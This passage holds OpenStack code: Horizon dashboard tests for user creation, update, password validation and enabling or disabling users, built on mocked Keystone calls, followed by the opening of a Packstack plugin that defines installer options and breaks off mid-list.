res = self.client.post(USER_CREATE_URL, formData)
self.assertFormError(res, "form", None, ['Passwords do not match.'])
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_get_default_domain, 2,
mock.call(test.IsHttpRequest()))
if api.keystone.VERSIONS.active >= 3:
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_tenant_list, 2,
mock.call(test.IsHttpRequest(), domain=domain_id))
else:
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_tenant_list, 2,
mock.call(test.IsHttpRequest(), user=None))
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_role_list, 2,
mock.call(test.IsHttpRequest()))
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_get_default_role, 2,
mock.call(test.IsHttpRequest()))
@test.create_mocks({api.keystone: ('get_default_domain',
'tenant_list',
'role_list',
'get_default_role')})
def test_create_validation_for_password_too_short(self):
user = self.users.get(id="1")
domain = self._get_default_domain()
domain_id = domain.id
self.mock_get_default_domain.return_value = domain
self.mock_tenant_list.return_value = [self.tenants.list(), False]
self.mock_role_list.return_value = self.roles.list()
self.mock_get_default_role.return_value = self.roles.first()
# check password min-len verification
formData = {'method': 'CreateUserForm',
'domain_id': domain_id,
'name': user.name,
'email': user.email,
'password': 'four',
'project': self.tenant.id,
'role_id': self.roles.first().id,
'confirm_password': 'four'}
res = self.client.post(USER_CREATE_URL, formData)
self.assertFormError(
res, "form", 'password',
['Password must be between 8 and 18 characters.'])
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_get_default_domain, 2,
mock.call(test.IsHttpRequest()))
if api.keystone.VERSIONS.active >= 3:
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_tenant_list, 2,
mock.call(test.IsHttpRequest(), domain=domain_id))
else:
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_tenant_list, 2,
mock.call(test.IsHttpRequest(), user=None))
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_role_list, 2,
mock.call(test.IsHttpRequest()))
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_get_default_role, 2,
mock.call(test.IsHttpRequest()))
@test.create_mocks({api.keystone: ('get_default_domain',
'tenant_list',
'role_list',
'get_default_role')})
def test_create_validation_for_password_too_long(self):
user = self.users.get(id="1")
domain = self._get_default_domain()
domain_id = domain.id
self.mock_get_default_domain.return_value = domain
self.mock_tenant_list.return_value = [self.tenants.list(), False]
self.mock_role_list.return_value = self.roles.list()
self.mock_get_default_role.return_value = self.roles.first()
# check password min-len verification
formData = {'method': 'CreateUserForm',
'domain_id': domain_id,
'name': user.name,
'email': user.email,
'password': 'MoreThanEighteenChars',
'project': self.tenant.id,
'role_id': self.roles.first().id,
'confirm_password': 'MoreThanEighteenChars'}
res = self.client.post(USER_CREATE_URL, formData)
self.assertFormError(
res, "form", 'password',
['Password must be between 8 and 18 characters.'])
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_get_default_domain, 2,
mock.call(test.IsHttpRequest()))
if api.keystone.VERSIONS.active >= 3:
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_tenant_list, 2,
mock.call(test.IsHttpRequest(), domain=domain_id))
else:
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_tenant_list, 2,
mock.call(test.IsHttpRequest(), user=None))
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_role_list, 2,
mock.call(test.IsHttpRequest()))
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_get_default_role, 2,
mock.call(test.IsHttpRequest()))
@override_settings(USER_TABLE_EXTRA_INFO={'phone_num': 'Phone Number'})
@test.create_mocks({api.keystone: ('user_get',
'domain_get',
'tenant_list',
'user_update',)})
def test_update(self):
user = self.users.get(id="1")
domain_id = user.domain_id
domain = self.domains.get(id=domain_id)
phone_number = "+81-3-1234-5678"
self.mock_user_get.return_value = user
self.mock_domain_get.return_value = domain
self.mock_tenant_list.return_value = [self.tenants.list(), False]
self.mock_user_update.return_value = None
formData = {'method': 'UpdateUserForm',
'id': user.id,
'name': user.name,
'description': user.description,
'email': user.email,
'project': self.tenant.id,
'phone_num': phone_number}
res = self.client.post(USER_UPDATE_URL, formData)
self.assertNoFormErrors(res)
self.mock_user_get.assert_called_once_with(test.IsHttpRequest(), '1',
admin=True)
self.mock_domain_get.assert_called_once_with(test.IsHttpRequest(),
domain_id)
if api.keystone.VERSIONS.active >= 3:
self.mock_tenant_list.assert_called_once_with(
test.IsHttpRequest(), domain=domain.id)
else:
self.mock_tenant_list.assert_called_once_with(
test.IsHttpRequest(), user=user.id)
kwargs = {'phone_num': phone_number}
self.mock_user_update.assert_called_once_with(test.IsHttpRequest(),
user.id,
email=user.email,
name=user.name,
**kwargs)
@test.create_mocks({api.keystone: ('user_get',
'domain_get',
'tenant_list',
'user_update',)})
def test_update_default_project(self):
user = self.users.get(id="1")
domain_id = user.domain_id
domain = self.domains.get(id=domain_id)
new_project_id = self.tenants.get(id="3").id
self.mock_user_get.return_value = user
self.mock_domain_get.return_value = domain
self.mock_tenant_list.return_value = [self.tenants.list(), False]
self.mock_user_update.return_value = None
formData = {'method': 'UpdateUserForm',
'id': user.id,
'name': user.name,
'description': user.description,
'email': user.email,
'project': new_project_id}
res = self.client.post(USER_UPDATE_URL, formData)
self.assertNoFormErrors(res)
self.mock_user_get.assert_called_once_with(test.IsHttpRequest(), '1',
admin=True)
self.mock_domain_get.assert_called_once_with(test.IsHttpRequest(),
domain_id)
if api.keystone.VERSIONS.active >= 3:
self.mock_tenant_list.assert_called_once_with(
test.IsHttpRequest(), domain=domain.id)
else:
self.mock_tenant_list.assert_called_once_with(
test.IsHttpRequest(), user=user.id)
self.mock_user_update.assert_called_once_with(test.IsHttpRequest(),
user.id,
email=user.email,
name=user.name,
project=new_project_id)
@test.create_mocks({api.keystone: ('user_get',
'domain_get',
'tenant_list',
'user_update',)})
def test_update_with_no_email_attribute(self):
user = self.users.get(id="5")
domain_id = user.domain_id
domain = self.domains.get(id=domain_id)
self.mock_user_get.return_value = user
self.mock_domain_get.return_value = domain
self.mock_tenant_list.return_value = [self.tenants.list(), False]
self.mock_user_update.return_value = None
formData = {'method': 'UpdateUserForm',
'id': user.id,
'name': user.name,
'description': user.description,
'email': "",
'project': self.tenant.id}
res = self.client.post(USER_UPDATE_URL, formData)
self.assertNoFormErrors(res)
self.mock_user_get.assert_called_once_with(test.IsHttpRequest(), '1',
admin=True)
self.mock_domain_get.assert_called_once_with(test.IsHttpRequest(),
domain_id)
if api.keystone.VERSIONS.active >= 3:
self.mock_tenant_list.assert_called_once_with(
test.IsHttpRequest(), domain=domain.id)
else:
self.mock_tenant_list.assert_called_once_with(
test.IsHttpRequest(), user=user.id)
self.mock_user_update.assert_called_once_with(test.IsHttpRequest(),
user.id,
email=user.email or "",
name=user.name,
project=self.tenant.id)
@test.create_mocks({api.keystone: ('user_get',
'domain_get',
'tenant_list',
'keystone_can_edit_user', )})
def test_update_with_keystone_can_edit_user_false(self):
user = self.users.get(id="1")
domain_id = user.domain_id
domain = self.domains.get(id=domain_id)
self.mock_user_get.return_value = user
self.mock_domain_get.return_value = domain
self.mock_tenant_list.return_value = [self.tenants.list(), False]
self.mock_keystone_can_edit_user.return_value = False
formData = {'method': 'UpdateUserForm',
'id': user.id,
'name': user.name,
'project': self.tenant.id, }
res = self.client.post(USER_UPDATE_URL, formData)
self.assertNoFormErrors(res)
self.assertMessageCount(error=1)
self.mock_user_get.assert_called_once_with(test.IsHttpRequest(), '1',
admin=True)
self.mock_domain_get.assert_called_once_with(test.IsHttpRequest(),
domain_id)
if api.keystone.VERSIONS.active >= 3:
self.mock_tenant_list.assert_called_once_with(
test.IsHttpRequest(), domain=domain.id)
else:
self.mock_tenant_list.assert_called_once_with(
test.IsHttpRequest(), user=user.id)
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_keystone_can_edit_user, 2,
mock.call())
@test.create_mocks({api.keystone: ('user_get',
'user_update_password')})
def test_change_password(self):
user = self.users.get(id="5")
test_password = 'normalpwd'
self.mock_user_get.return_value = user
self.mock_user_update_password.return_value = None
formData = {'method': 'ChangePasswordForm',
'id': user.id,
'name': user.name,
'password': test_password,
'confirm_password': test_password}
res = self.client.post(USER_CHANGE_PASSWORD_URL, formData)
self.assertNoFormErrors(res)
self.mock_user_get.assert_called_once_with(test.IsHttpRequest(), '1',
admin=False)
self.mock_user_update_password.assert_called_once_with(
test.IsHttpRequest(), user.id, test_password, admin=False)
@test.create_mocks({api.keystone: ('user_get',
'user_verify_admin_password')})
@override_settings(ENFORCE_PASSWORD_CHECK=True)
def test_change_password_validation_for_admin_password(self):
user = self.users.get(id="1")
test_password = 'normalpwd'
admin_password = 'secret'
self.mock_user_get.return_value = user
self.mock_user_verify_admin_password.return_value = None
formData = {'method': 'ChangePasswordForm',
'id': user.id,
'name': user.name,
'password': test_password,
'confirm_password': test_password,
'admin_password': admin_password}
res = self.client.post(USER_CHANGE_PASSWORD_URL, formData)
self.assertFormError(res, "form", None,
['The admin password is incorrect.'])
self.mock_user_get.assert_called_once_with(test.IsHttpRequest(), '1',
admin=False)
self.mock_user_verify_admin_password.assert_called_once_with(
test.IsHttpRequest(), admin_password)
@test.create_mocks({api.keystone: ('user_get',)})
def test_update_validation_for_password_too_short(self):
user = self.users.get(id="1")
self.mock_user_get.return_value = user
formData = {'method': 'ChangePasswordForm',
'id': user.id,
'name': user.name,
'password': 't',
'confirm_password': 't'}
res = self.client.post(USER_CHANGE_PASSWORD_URL, formData)
self.assertFormError(
res, "form", 'password',
['Password must be between 8 and 18 characters.'])
self.mock_user_get.assert_called_once_with(test.IsHttpRequest(), '1',
admin=False)
@test.create_mocks({api.keystone: ('user_get',)})
def test_update_validation_for_password_too_long(self):
user = self.users.get(id="1")
self.mock_user_get.return_value = user
formData = {'method': 'ChangePasswordForm',
'id': user.id,
'name': user.name,
'password': 'ThisIsASuperLongPassword',
'confirm_password': 'ThisIsASuperLongPassword'}
res = self.client.post(USER_CHANGE_PASSWORD_URL, formData)
self.assertFormError(
res, "form", 'password',
['Password must be between 8 and 18 characters.'])
self.mock_user_get.assert_called_once_with(test.IsHttpRequest(), '1',
admin=False)
@test.create_mocks({api.keystone: ('get_effective_domain_id',
'user_update_enabled',
'user_list',
'domain_lookup')})
def test_enable_user(self):
domain = self._get_default_domain()
domain_id = domain.id
filters = {}
user = self.users.get(id="2")
users = self._get_users(domain_id)
user.enabled = False
self.mock_get_effective_domain_id.return_value = None
self.mock_user_list.return_value = users
self.mock_user_update_enabled.return_value = user
self.mock_domain_lookup.return_value = {domain.id: domain.name}
formData = {'action': 'users__toggle__%s' % user.id}
res = self.client.post(USERS_INDEX_URL, formData)
self.assertRedirectsNoFollow(res, USERS_INDEX_URL)
self.mock_get_effective_domain_id.assert_called_once_with(
test.IsHttpRequest())
self.mock_user_list.assert_called_once_with(
test.IsHttpRequest(), domain=domain_id, filters=filters)
self.mock_user_update_enabled.assert_called_once_with(
test.IsHttpRequest(), user.id, True)
self.mock_domain_lookup.assert_called_once_with(test.IsHttpRequest())
@test.create_mocks({api.keystone: ('get_effective_domain_id',
'user_update_enabled',
'user_list',
'domain_lookup')})
def test_disable_user(self):
domain = self._get_default_domain()
domain_id = domain.id
filters = {}
user = self.users.get(id="2")
users = self._get_users(domain_id)
self.assertTrue(user.enabled)
self.mock_get_effective_domain_id.return_value = None
self.mock_user_list.return_value = users
self.mock_user_update_enabled.return_value = user
self.mock_domain_lookup.return_value = {domain.id: domain.name}
formData = {'action': 'users__toggle__%s' % user.id}
res = self.client.post(USERS_INDEX_URL, formData)
self.assertRedirectsNoFollow(res, USERS_INDEX_URL)
self.mock_get_effective_domain_id.assert_called_once_with(
test.IsHttpRequest())
self.mock_user_list.assert_called_once_with(
test.IsHttpRequest(), domain=domain_id, filters=filters)
self.mock_user_update_enabled.assert_called_once_with(
test.IsHttpRequest(), user.id, False)
self.mock_domain_lookup.assert_called_once_with(test.IsHttpRequest())
@test.create_mocks({api.keystone: ('get_effective_domain_id',
'user_update_enabled',
'user_list',
'domain_lookup')})
def test_enable_disable_user_exception(self):
domain = self._get_default_domain()
domain_id = domain.id
filters = {}
user = self.users.get(id="2")
users = self._get_users(domain_id)
user.enabled = False
self.mock_get_effective_domain_id.return_value = None
self.mock_user_list.return_value = users
self.mock_user_update_enabled.side_effect = self.exceptions.keystone
self.mock_domain_lookup.return_value = {domain.id: domain.name}
formData = {'action': 'users__toggle__%s' % user.id}
res = self.client.post(USERS_INDEX_URL, formData)
self.assertRedirectsNoFollow(res, USERS_INDEX_URL)
self.mock_get_effective_domain_id.assert_called_once_with(
test.IsHttpRequest())
self.mock_user_list.assert_called_once_with(
test.IsHttpRequest(), domain=domain_id, filters=filters)
self.mock_user_update_enabled.assert_called_once_with(
test.IsHttpRequest(), user.id, True)
self.mock_domain_lookup.assert_called_once_with(test.IsHttpRequest())
@test.create_mocks({api.keystone: ('get_effective_domain_id',
'user_list',
'domain_lookup')})
def test_disabling_current_user(self):
domain = self._get_default_domain()
domain_id = domain.id
filters = {}
users = self._get_users(domain_id)
self.mock_get_effective_domain_id.return_value = None
self.mock_user_list.return_value = users
self.mock_domain_lookup.return_value = {domain.id: domain.name}
formData = {'action': 'users__toggle__%s' % self.request.user.id}
res = self.client.post(USERS_INDEX_URL, formData, follow=True)
self.assertEqual(list(res.context['messages'])[0].message,
u'You are not allowed to disable user: '
u'test_user')
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_get_effective_domain_id, 2,
mock.call(test.IsHttpRequest()))
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_user_list, 2,
mock.call(test.IsHttpRequest(), domain=domain_id, filters=filters))
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_domain_lookup, 2,
mock.call(test.IsHttpRequest()))
@test.create_mocks({api.keystone: ('get_effective_domain_id',
'user_list',
'domain_lookup')})
def test_disabling_current_user_domain_name(self):
domain = self._get_default_domain()
domains = self.domains.list()
filters = {}
domain_id = domain.id
users = self._get_users(domain_id)
domain_lookup = dict((d.id, d.name) for d in domains)
self.mock_get_effective_domain_id.return_value = None
for u in users:
u.domain_name = domain_lookup.get(u.domain_id)
self.mock_domain_lookup.return_value = domain_lookup
self.mock_user_list.return_value = users
formData = {'action': 'users__toggle__%s' % self.request.user.id}
res = self.client.post(USERS_INDEX_URL, formData, follow=True)
self.assertEqual(list(res.context['messages'])[0].message,
u'You are not allowed to disable user: '
u'test_user')
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_get_effective_domain_id, 2,
mock.call(test.IsHttpRequest()))
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_domain_lookup, 2,
mock.call(test.IsHttpRequest()))
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_user_list, 2,
mock.call(test.IsHttpRequest(), domain=domain_id, filters=filters))
@test.create_mocks({api.keystone: ('get_effective_domain_id',
'user_list',
'domain_lookup')})
def test_delete_user_with_improper_permissions(self):
domain = self._get_default_domain()
domain_id = domain.id
filters = {}
users = self._get_users(domain_id)
self.mock_get_effective_domain_id.return_value = None
self.mock_user_list.return_value = users
self.mock_domain_lookup.return_value = {domain.id: domain.name}
formData = {'action': 'users__delete__%s' % self.request.user.id}
res = self.client.post(USERS_INDEX_URL, formData, follow=True)
self.assertEqual(list(res.context['messages'])[0].message,
u'You are not allowed to delete user: %s'
% self.request.user.username)
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_get_effective_domain_id, 2,
mock.call(test.IsHttpRequest()))
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_user_list, 2,
mock.call(test.IsHttpRequest(), domain=domain_id, filters=filters))
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_domain_lookup, 2,
mock.call(test.IsHttpRequest()))
@test.create_mocks({api.keystone: ('get_effective_domain_id',
'user_list',
'domain_lookup')})
def test_delete_user_with_improper_permissions_domain_name(self):
domain = self._get_default_domain()
domains = self.domains.list()
domain_id = domain.id
filters = {}
users = self._get_users(domain_id)
domain_lookup = dict((d.id, d.name) for d in domains)
self.mock_get_effective_domain_id.return_value = None
for u in users:
u.domain_name = domain_lookup.get(u.domain_id)
self.mock_user_list.return_value = users
self.mock_domain_lookup.return_value = domain_lookup
formData = {'action': 'users__delete__%s' % self.request.user.id}
res = self.client.post(USERS_INDEX_URL, formData, follow=True)
self.assertEqual(list(res.context['messages'])[0].message,
u'You are not allowed to delete user: %s'
% self.request.user.username)
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_get_effective_domain_id, 2,
mock.call(test.IsHttpRequest()))
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_user_list, 2,
mock.call(test.IsHttpRequest(), domain=domain_id, filters=filters))
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_domain_lookup, 2,
mock.call(test.IsHttpRequest()))
@test.create_mocks({api.keystone: ('domain_get',
'user_get',
'tenant_get')})
def test_detail_view(self):
domain = self._get_default_domain()
user = self.users.get(id="1")
tenant = self.tenants.get(id=user.project_id)
self.mock_domain_get.return_value = domain
self.mock_user_get.return_value = user
self.mock_tenant_get.return_value = tenant
res = self.client.get(USER_DETAIL_URL, args=[user.id])
# The first tab is the overview tab; it is the one loaded when no query
# parameter is present in the URL.
self.assertTemplateUsed(res, 'identity/users/_detail_overview.html')
self.assertEqual(res.context['user'].name, user.name)
self.assertEqual(res.context['user'].id, user.id)
self.assertEqual(res.context['tenant_name'], tenant.name)
self.mock_domain_get.assert_called_once_with(test.IsHttpRequest(), '1')
self.mock_user_get.assert_called_once_with(test.IsHttpRequest(), '1',
admin=False)
self.mock_tenant_get.assert_called_once_with(test.IsHttpRequest(),
user.project_id)
@test.create_mocks({api.keystone: ('user_get',)})
def test_detail_view_with_exception(self):
user = self.users.get(id="1")
self.mock_user_get.side_effect = self.exceptions.keystone
res = self.client.get(USER_DETAIL_URL, args=[user.id])
self.assertRedirectsNoFollow(res, USERS_INDEX_URL)
self.mock_user_get.assert_called_once_with(test.IsHttpRequest(), '1',
admin=False)
@test.create_mocks({api.keystone: ('domain_get',
'user_get',
'tenant_get')})
def test_detail_view_overview_tab(self):
"""Test the overview tab of the detail view .
Test the overview tab using directly the url targeting the tab.
"""
domain = self._get_default_domain()
user = self.users.get(id="1")
tenant = self.tenants.get(id=user.project_id)
self.mock_domain_get.return_value = domain
self.mock_user_get.return_value = user
self.mock_tenant_get.return_value = tenant
# Url of the overview tab of the detail view
url = USER_DETAIL_URL  # already reversed with args=[1], matching user.id here
detail_view = tabs.UserDetailTabs(self.request, user=user)
overview_tab_link = "?%s=%s" % (
detail_view.param_name,
detail_view.get_tab("overview").get_id()
)
url += overview_tab_link
res = self.client.get(url)
self.assertTemplateUsed(res, 'identity/users/_detail_overview.html')
self.assertEqual(res.context['user'].name, user.name)
self.assertEqual(res.context['user'].id, user.id)
self.assertEqual(res.context['tenant_name'], tenant.name)
self.mock_domain_get.assert_called_once_with(test.IsHttpRequest(), '1')
self.mock_user_get.assert_called_once_with(test.IsHttpRequest(), '1',
admin=False)
self.mock_tenant_get.assert_called_once_with(test.IsHttpRequest(),
user.project_id)
@test.create_mocks({api.keystone: ('user_get',
'domain_get',
'tenant_list',)})
def test_get_update_form_init_values(self):
user = self.users.get(id="1")
domain_id = user.domain_id
domain = self.domains.get(id=domain_id)
self.mock_user_get.return_value = user
self.mock_domain_get.return_value = domain
self.mock_tenant_list.return_value = [self.tenants.list(), False]
res = self.client.get(USER_UPDATE_URL)
# Check that the form contains the default values as initialized by
# the UpdateView
self.assertEqual(res.context['form']['name'].value(), user.name)
self.assertEqual(res.context['form']['email'].value(), user.email)
self.assertEqual(res.context['form']['description'].value(),
user.description)
self.assertEqual(res.context['form']['project'].value(),
user.project_id)
self.assertEqual(res.context['form']['domain_id'].value(),
user.domain_id)
self.assertEqual(res.context['form']['domain_name'].value(),
domain.name)
self.mock_user_get.assert_called_once_with(test.IsHttpRequest(), '1',
admin=True)
self.mock_domain_get.assert_called_once_with(test.IsHttpRequest(),
domain_id)
self.mock_tenant_list.assert_called_once_with(test.IsHttpRequest(),
domain=domain_id)
@test.create_mocks({api.keystone: ('user_get',
'domain_get',
'tenant_list',
'user_update',)})
def test_update_different_description(self):
user = self.users.get(id="1")
domain_id = user.domain_id
domain = self.domains.get(id=domain_id)
self.mock_user_get.return_value = user
self.mock_domain_get.return_value = domain
self.mock_tenant_list.return_value = [self.tenants.list(), False]
self.mock_user_update.return_value = None
formData = {'method': 'UpdateUserForm',
'id': user.id,
'name': user.name,
'description': 'changed',
'email': user.email,
'project': self.tenant.id}
res = self.client.post(USER_UPDATE_URL, formData)
self.assertNoFormErrors(res)
self.mock_user_get.assert_called_once_with(test.IsHttpRequest(), '1',
admin=True)
self.mock_domain_get.assert_called_once_with(test.IsHttpRequest(),
domain_id)
if api.keystone.VERSIONS.active >= 3:
self.mock_tenant_list.assert_called_once_with(test.IsHttpRequest(),
domain=domain.id)
else:
self.mock_tenant_list.assert_called_once_with(test.IsHttpRequest(),
user=user.id)
self.mock_user_update.assert_called_once_with(test.IsHttpRequest(),
user.id,
email=user.email,
name=user.name,
description='changed')
@test.update_settings(FILTER_DATA_FIRST={'identity.users': True})
def test_index_with_filter_first(self):
res = self.client.get(USERS_INDEX_URL)
self.assertTemplateUsed(res, 'identity/users/index.html')
users = res.context['table'].data
self.assertItemsEqual(users, [])
class SeleniumTests(test.SeleniumAdminTestCase):
def _get_default_domain(self):
domain = {"id": None, "name": None}
return api.base.APIDictWrapper(domain)
@test.create_mocks({api.keystone: ('get_default_domain',
'tenant_list',
'get_default_role',
'role_list',
'user_list',
'domain_lookup')})
def test_modal_create_user_with_passwords_not_matching(self):
domain = self._get_default_domain()
self.mock_get_default_domain.return_value = domain
self.mock_tenant_list.return_value = [self.tenants.list(), False]
self.mock_role_list.return_value = self.roles.list()
self.mock_user_list.return_value = self.users.list()
self.mock_domain_lookup.return_value = {None: None}
self.mock_get_default_role.return_value = self.roles.first()
self.selenium.get("%s%s" % (self.live_server_url, USERS_INDEX_URL))
# Open the modal menu
self.selenium.find_element_by_id("users__action_create").click()
wait = self.ui.WebDriverWait(self.selenium, 10,
ignored_exceptions=[socket_timeout])
wait.until(lambda x: self.selenium.find_element_by_id("id_name"))
self.assertFalse(self._is_element_present("id_confirm_password_error"),
"Password error element shouldn't yet exist.")
self.selenium.find_element_by_id("id_name").send_keys("Test User")
self.selenium.find_element_by_id("id_password").send_keys("test")
self.selenium.find_element_by_id("id_confirm_password").send_keys("te")
self.selenium.find_element_by_id("id_email").send_keys("[email protected]")
wait.until(lambda x: self.selenium.find_element_by_id(
"id_confirm_password_error"))
self.assertTrue(self._is_element_present("id_confirm_password_error"),
"Couldn't find password error element.")
self.assertEqual(2, self.mock_get_default_domain.call_count)
self.mock_get_default_domain.assert_has_calls([
mock.call(test.IsHttpRequest()),
mock.call(test.IsHttpRequest()),
])
self.mock_tenant_list.assert_called_once_with(test.IsHttpRequest(),
domain=None)
self.mock_role_list.assert_called_once_with(test.IsHttpRequest())
self.mock_user_list.assert_called_once_with(test.IsHttpRequest(),
domain=None, filters={})
self.mock_domain_lookup.assert_called_once_with(test.IsHttpRequest())
self.mock_get_default_role.assert_called_once_with(
test.IsHttpRequest())
@test.create_mocks({api.keystone: ('user_get',)})
def test_update_user_with_passwords_not_matching(self):
self.mock_user_get.return_value = self.user
self.selenium.get("%s%s" % (self.live_server_url,
USER_CHANGE_PASSWORD_URL))
self.assertFalse(self._is_element_present("id_confirm_password_error"),
"Password error element shouldn't yet exist.")
self.selenium.find_element_by_id("id_password").send_keys("test")
self.selenium.find_element_by_id("id_confirm_password").send_keys("te")
self.selenium.find_element_by_id("id_name").click()
self.assertTrue(self._is_element_present("id_confirm_password_error"),
"Couldn't find password error element.")
self.mock_user_get.assert_called_once_with(test.IsHttpRequest(), '1',
admin=False)
def _is_element_present(self, element_id):
try:
self.selenium.find_element_by_id(element_id)
return True
except Exception:
return False
|
|
"""
Plugin responsible for setting OpenStack global options
"""
import glob
import logging
import os
import re
import uuid
from packstack.installer import (basedefs, exceptions, processors, utils,
validators)
from packstack.modules.common import filtered_hosts
from packstack.modules.ospluginutils import (getManifestTemplate,
appendManifestFile)
# Controller object will be initialized from main flow
controller = None
# Plugin name
PLUGIN_NAME = "OS-PRESCRIPT"
logging.debug("plugin %s loaded", __name__)
def initConfig(controllerObject):
global controller
controller = controllerObject
paramsList = [{"CMD_OPTION" : "ssh-public-key",
"USAGE" : "Path to a Public key to install on servers. If a usable key has not been installed on the remote servers the user will be prompted for a password and this key will be installed so the password will not be required again",
"PROMPT" : "Enter the path to your ssh Public key to install on servers",
"OPTION_LIST" : [],
"VALIDATORS" : [validators.validate_file,
validators.validate_sshkey],
"PROCESSORS" : [processors.process_ssh_key],
"DEFAULT_VALUE" : (glob.glob(os.path.join(os.environ["HOME"], ".ssh/*.pub"))+[""])[0],
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_SSH_KEY",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "os-mysql-install",
"USAGE" : "Set to 'y' if you would like Packstack to install MySQL",
"PROMPT" : "Should Packstack install MySQL DB",
"OPTION_LIST" : ["y", "n"],
"VALIDATORS" : [validators.validate_options],
"DEFAULT_VALUE" : "y",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_MYSQL_INSTALL",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "os-glance-install",
"USAGE" : "Set to 'y' if you would like Packstack to install OpenStack Image Service (Glance)",
"PROMPT" : "Should Packstack install OpenStack Image Service (Glance)",
"OPTION_LIST" : ["y", "n"],
"VALIDATORS" : [validators.validate_options],
"DEFAULT_VALUE" : "y",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_GLANCE_INSTALL",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "os-cinder-install",
"USAGE" : "Set to 'y' if you would like Packstack to install OpenStack Block Storage (Cinder)",
"PROMPT" : "Should Packstack install OpenStack Block Storage (Cinder) service",
"OPTION_LIST" : ["y", "n"],
"VALIDATORS" : [validators.validate_options],
"DEFAULT_VALUE" : "y",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_CINDER_INSTALL",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "os-nova-install",
"USAGE" : "Set to 'y' if you would like Packstack to install OpenStack Compute (Nova)",
"PROMPT" : "Should Packstack install OpenStack Compute (Nova) service",
"OPTION_LIST" : ["y", "n"],
"VALIDATORS" : [validators.validate_options],
"DEFAULT_VALUE" : "y",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_NOVA_INSTALL",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "os-neutron-install",
"USAGE" : "Set to 'y' if you would like Packstack to install OpenStack Networking (Neutron)",
"PROMPT" : "Should Packstack install OpenStack Networking (Neutron) service",
"OPTION_LIST" : ["y", "n"],
"VALIDATORS" : [validators.validate_options],
"DEFAULT_VALUE" : "y",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_NEUTRON_INSTALL",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "os-horizon-install",
"USAGE" : "Set to 'y' if you would like Packstack to install OpenStack Dashboard (Horizon)",
"PROMPT" : "Should Packstack install OpenStack Dashboard (Horizon)",
"OPTION_LIST" : ["y", "n"],
"VALIDATORS" : [validators.validate_options],
"DEFAULT_VALUE" : "y",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_HORIZON_INSTALL",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "os-swift-install",
"USAGE" : "Set to 'y' if you would like Packstack to install OpenStack Object Storage (Swift)",
"PROMPT" : "Should Packstack install OpenStack Object Storage (Swift)",
"OPTION_LIST" : ["y", "n"],
"VALIDATORS" : [validators.validate_options],
"DEFAULT_VALUE" : "n",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_SWIFT_INSTALL",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "os-ceilometer-install",
"USAGE" : "Set to 'y' if you would like Packstack to install OpenStack Metering (Ceilometer)",
"PROMPT" : "Should Packstack install OpenStack Metering (Ceilometer)",
"OPTION_LIST" : ["y", "n"],
"VALIDATORS" : [validators.validate_options],
"DEFAULT_VALUE" : "y",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_CEILOMETER_INSTALL",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "os-heat-install",
"USAGE" : "Set to 'y' if you would like Packstack to install OpenStack Orchestration (Heat)",
"PROMPT" : "Should Packstack install OpenStack Orchestration (Heat)",
"OPTION_LIST" : ["y", "n"],
"VALIDATORS" : [validators.validate_options],
"DEFAULT_VALUE" : "n",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_HEAT_INSTALL",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "os-client-install",
"USAGE" : "Set to 'y' if you would like Packstack to install the OpenStack Client packages. An admin \"rc\" file will also be installed",
